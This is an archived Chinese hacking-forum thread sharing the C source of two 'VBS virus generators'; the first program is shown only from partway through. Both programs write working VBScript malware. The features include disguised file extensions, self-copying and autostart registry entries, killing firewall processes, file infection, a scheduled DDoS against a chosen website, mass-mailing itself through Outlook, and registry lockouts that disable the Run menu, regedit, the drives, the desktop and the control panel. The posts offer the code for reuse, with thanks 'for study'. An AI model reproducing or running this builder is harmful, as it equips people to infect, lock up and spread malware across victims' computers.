char *mail7="set attachment=mail.attachments\nattachment.add dir2&\"\\system.vbe\"\nitem.deleteaftersubmit=True\nif item.to <>\"\" then\nitem.send\na.regwrite \"HKCU\\Software\\Mailtest\\mailed\",\"1\"\nend if\nnext\nend if\nnext\nend if\n";
char *mail8="end function\n";
char *end="\n\n\'Vbsmc 0.1 Beta. By[W.Z.T]";
printf("1st,What name do you want to name the Virus?\n");
printf("\n(example: *.vbs,*.vbe,*.jpg.vbs,*.txt.vbs,*.gif.vbs,*.html.vbs)\n");
scanf("%s",road);
printf("\n2nd,Input Your name:");
scanf("%s",name2);

sgl 2005-6-29 12:47

if((fp=fopen(road,"w"))==NULL)
{
   printf("Error! Can't create the file.\n");
   out();
}
fputs("' created by " ,fp);
fputs(name2,fp);
fputs(a,fp);
printf("\n3rd,do you want to copy it to \"windows\"? (1 or 0)\n");
scanf("%d",&aa);
if(aa==1)
{
   fputs(c,fp);
   printf("\ndone.\n");
}
printf("4th,do you want to copy it to \"system\"? (1 or 0)\n");
scanf("%d",&bb);
if(bb==1)
{
   fputs(b,fp);
   printf("\ndone.\n");
}
clrscr();
window(1,12,80,12);
printf("\n5th,This function can stop the firewall's process all the time.(1 or 0)\n");
scanf("%d",&cc);
if(cc==1)
{
fflush(stdin);
printf("Enter the password before use this function:\n");
for(j=0;;)
{
if((pwd[j]=getch())==13)
{
   pwd[j]='\0';
   break;
}
else if(pwd[j]==8)
{
  if(y!=0)
  {
printf("\b");
y--;
j--;
  }
  putchar(0);
  printf("\b");
}
else if(j==11)
  continue;
else
{
  printf("*");
  y++;
  j++;
}
}
if(strcmp(pwd,pass)==0)
{
fputs(d,fp);
fputs(e,fp);
fputs(f,fp);
fputs(g,fp);
fputs(h,fp);
fputs(ii,fp);
printf("\ndone.\n");
}
else
{
printf("\nPassword Error! You can't use this function.\n");
}
}
fputs(jj,fp);
fputs(k,fp);
fputs(l,fp);
fputs(mm,fp);
fputs(nn,fp);
fputs(oo,fp);
fputs(pp,fp);
fputs(qq,fp);
fputs(rr,fp);
fputs(ss,fp);
fputs(tt,fp);
printf("\n6th,Do you want to run it every 1 mintue? (1/0)\n");
scanf("%d",&dd);
if(dd==1)
{
fputs(uu,fp);
fputs(vv,fp);
fputs(ww,fp);
fputs(xx,fp);
fputs(yy,fp);
}
printf("\ndone!\n");
printf("7th,Do you want to join an *.exe in it? (1/0)\n");
scanf("%d",&ee);
if(ee==1)
{
fputs(kill1,fp);
printf("Where is the *.exe? Input the road:\n");
scanf("%s",road2);
if((fp1=fopen(road2,"rb"))==NULL)
{
printf("Can't open the file %s",road2);
exit(0);
}
while(!feof(fp1))
{
ch=fgetc(fp1);
fprintf(fp,"%x",ch);
}
fputs("\"\n",fp);
fputs(kill2,fp);
fputs(kill3,fp);
fclose(fp1);
}
printf("\ndone!\n");
printf("8th,Do you want to overwrite Regedit? (1/0)\n");
scanf("%d",&ff);
if(ff==1)
{
fputs(reg1,fp);
printf("\nDo you want D.D.O.S to a website? (1/0)\n");
scanf("%d",&gg);
if(gg==1)
{
printf("When(example:20040101)\n");
scanf("%s",time);
printf("Where(example:[url]www.Mirosoft.com[/url])\n");
scanf("%s",web);
fputs("if year(date)&month(date)&day(date)= ",fp);
fputs(time ,fp);
fputs( "then\n",fp);
fputs(reg2,fp);
fputs(web,fp);
fputs("\",0\nend if\n",fp);
}
fputs(reg3,fp);
fputs(reg4,fp);
fputs(reg5,fp);
fputs(reg6,fp);
fputs(reg7,fp);
fputs(reg8,fp);
fputs(reg9,fp);
fputs(reg10,fp);
fputs(reg11,fp);
}
printf("\ndone!\n");
printf("9th,Do you want to infect files? (1/0)\n");
scanf("%d",&hh);
if(hh==1)
{
fputs(infect1,fp);
fputs(infect2,fp);
fputs(infect3,fp);
fputs(infect4,fp);
fputs("if ",fp);
printf("Please chocie the files you want to infect:\n\n");
for(i=0;i<27;i++)
{
if(i%13==0)
{  printf("\n");}
printf("%5s",*(pl+i));
}
printf("\n\nYour choice:\n");
scanf("%s",pop);
for(i=0;(ch=*(pop+i))!='\0';i++)
{
  if(ch==',')
word=0;
  else
  {
if(word==0)
{
  word=1;
  number++;
}
  }
}
printf("%d\n",number);
printf("input again:\n");
for(i=0;i<number;i++)
{
gets(*(pa+i));
}
printf("\n\n");
for(i=0;i<number;i++)
{
strcat(str1[i],*(pa+i));
strcat(str1[i],str2);
}
for(i=0;i<number;i++)
{
fputs(str1[i],fp);
fputs(" ",fp);
}
fputs(" (ext=\"html\") then\n",fp);
fputs(infect5,fp);
fputs(infect6,fp);
fputs(infect7,fp);
fputs(infect8,fp);
fputs(infect9,fp);
fputs(infect10,fp);
fputs(infect11,fp);
fputs(infect12,fp);
fputs(infect13,fp);
}
printf("\ndone!\n");
printf("10th,Do you want to attack the network? (1/0)\n");
scanf("%d",&jjj);
if(jjj==1)
{
fputs(net1,fp);
fputs(net2,fp);
fputs(net3,fp);
fputs(net4,fp);
fputs(net5,fp);
fputs(net6,fp);
fputs(net7,fp);
fputs(net8,fp);
fputs(net9,fp);
fputs(net10,fp);
}
printf("\ndone.\n");
printf("\n11th,Do you want to mail to others? (1 or 0)\n");
scanf("%d",&kkk);
if(kkk==1)
{
  fputs(mail1,fp);
  fputs(mail2,fp);
  fputs(mail3,fp);
  printf("How many people do you want to mail?\n");
  scanf("%s",vc);
  printf("input the mail subject:\n");
  scanf("%s",sub);
  printf("input the body:\n");
  scanf("%s",bo);
  fputs(vc,fp);
  fputs("\n",fp);
  fputs(mail4,fp);
  fputs(mail5,fp);
  fputs(sub,fp);
  fputs("\"\n",fp);
  fputs(mail6,fp);
  fputs(bo,fp);
  fputs("\"\n",fp);
  fputs(mail7,fp);
  fputs(mail8,fp);
}
fputs(end,fp);
printf("\n!done!\n");
printf("Well done.\n");
fclose(fp);
}

sgl 2005-6-29 12:50

这个病毒生成器，比乱世天使大哥制造出的病毒要强很多，不过他都是几年前的作品了，我这个又没写界面，也没什么技术含量

轩辕战刀 2005-10-9 18:18

为学习之用,贴子我转到我博客了,并注明来源了.
谢谢各位大哥的奉献~~~~~~~~~

2b007 2006-1-11 18:39

//刚学c的时候写的一个垃圾东西
//没有什么技术含量,就是从键盘得到个xx然后把预定的vbs代码写到文本而已

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int ac,char *av[])
{
if(ac!=2)
{
printf("=========================================\n");
printf("  病毒制造机 by :2b007 QQ:409558746 \n\n");
printf("  欢迎加入我们！QQ群： 7884975  \n");

printf("    usage:%s vir.vbs\n",av[0]);
printf("=========================================\n");
      exit (0);
   }
char *ps="And 1 for Yes ,0 or others for Not:";
int aa;
FILE *fp1,*fp2;
printf("========================================\n");
printf("病毒制造机 by :2b007 QQ:409558746 \n\n");
printf("欢迎加入我们！QQ群： 7884975  \n");
printf("=========================================\n");
fp1=fopen(av[1],"w");
if(fp1==NULL)
{
   printf("Can\'t open the file ! :( ");
   exit(0);
}
fp2=fopen("rest.vbs","w");
if(fp2==NULL)
{
   printf("Can\'t open the file ! :( ");
   exit(0);
}
fprintf(fp1,"On Error Resume Next\nSet fs=CreateObject(\"Scripting.FileSystemObject\")\n");
fprintf(fp1,"Set dir1=fs.GetSpecialFolder(0)\nSet dir2=fs.GetSpecialFolder(1)\n");
fprintf(fp1,"Set so=CreateObject(\"Scripting.FileSystemObject\")\n");
fprintf(fp1,"dim r\n");
fprintf(fp1,"Set r=CreateObject(\"Wscript.Shell\")\n");
fprintf(fp2,"On Error Resume Next\nSet fs=CreateObject(\"Scripting.FileSystemObject\")\n");
fprintf(fp2,"Set dir1=fs.GetSpecialFolder(0)\nSet dir2=fs.GetSpecialFolder(1)\n");
fprintf(fp2,"Set so=CreateObject(\"Scripting.FileSystemObject\")\n");
fprintf(fp2,"dim r\n");
fprintf(fp2,"Set r=CreateObject(\"Wscript.Shell\")\n");
printf("复制病毒副本到Start Menu启动菜单吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{

   fprintf(fp1,"so.GetFile(WScript.ScriptFullName).Copy(dir1&\"\\%s\")\n",av[1]);
   fprintf(fp1,"so.GetFile(WScript.ScriptFullName).Copy(dir2&\"\\%s\")\n",av[1]);
   fprintf(fp1,"so.GetFile(WScript.ScriptFullName).Copy(dir1&\"\\Start Menu\\Programs\\启动\\%s\")\n",av[1]);
   fprintf(fp2,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe\",\"start.exe /m deltree /y \"&dir1&\"\\%s\"\n",av[1]);
   fprintf(fp2,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe\",\"start.exe /m deltree /y \"&dir2&\"\\%s\"\n",av[1]);

fprintf(fp2,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe\",\"start.exe /m deltree /y \"&dir1&\"\\Start Menu\\Programs\\启动\\%s\"\n",av[1]);
}
printf("\n-=欢迎进入注册表修改部分=-\n");

printf("禁止\"运行\"菜单吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\",1,\"REG_DWORD\"\n");
   fprintf(fp2," r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\",0,\"REG_DWORD\"\n");
}

printf("\n禁止\"关闭\"菜单吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose\",0,\"REG_DWORD\"\n");
}
printf("隐藏所有逻辑盘符吗？\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\",63000000,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\",0,\"REG_DWORD\"\n");
}
printf("禁止注册表编辑吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\",0,\"REG_DWORD\"\n");
}
printf("禁止开机注册表扫描吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ScanRegistry\",\"\"\n");
   fprintf(fp2,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ScanRegistry\",\"scanregw.exe /autorun\"\n");
}
printf("要禁止注销吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff\",0,\"REG_DWORD\"\n");
}
printf("要禁止MS-DOS实模式吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode\",0,\"REG_DWORD\"\n");
}
printf ("使这个脚本本身开机自动运行吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   printf("\n大哥，够狠！！");
   fprintf(fp1,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Win32system\",\"av[1]\" \n");
   fprintf(fp2,"r.Regwrite \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Win32system\",\"\"\n");
}
printf("要禁止显示桌面图标吗?");
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop\",0,\"REG_DWORD\"\n");
}
printf("要禁止纯DOS模式吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   printf("大哥，你做得绝！！对他就该这样！！" );
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled\",0,\"REG_DWORD\"\n");
}
printf("要禁止任务栏和开始菜单吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskBar\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskBar\",0,\"REG_DWORD\"\n");
}
printf(" 禁止右键吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu\",0,\"REG_DWORD\"\n");
}


printf("要禁止控制面板吗?\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders\",1,\"REG_DWORD\"\n");
   fprintf(fp2,"r.Regwrite \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders\",0,\"REG_DWORD\"\n");
}
printf("禁止导入使用.reg文件吗？\n%s",ps);
scanf("%d",&aa);
if(aa==1)
{
   fprintf(fp1,"r.Regwrite \"HKLM\\Software\\CLASSES\\.reg\\\",\"txtfile\"\n");
   fprintf(fp2,"r.Regwrite \"HKLM\\Software\\CLASSES\\.reg\\\",\"\"\n");
}



fclose(fp1);
fclose(fp2);
return 0;
}

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[转载]VBS病毒生成器核心源代码 此程序可以生成病毒

[转载]VBS病毒生成器核心源代码此程序可以生成病毒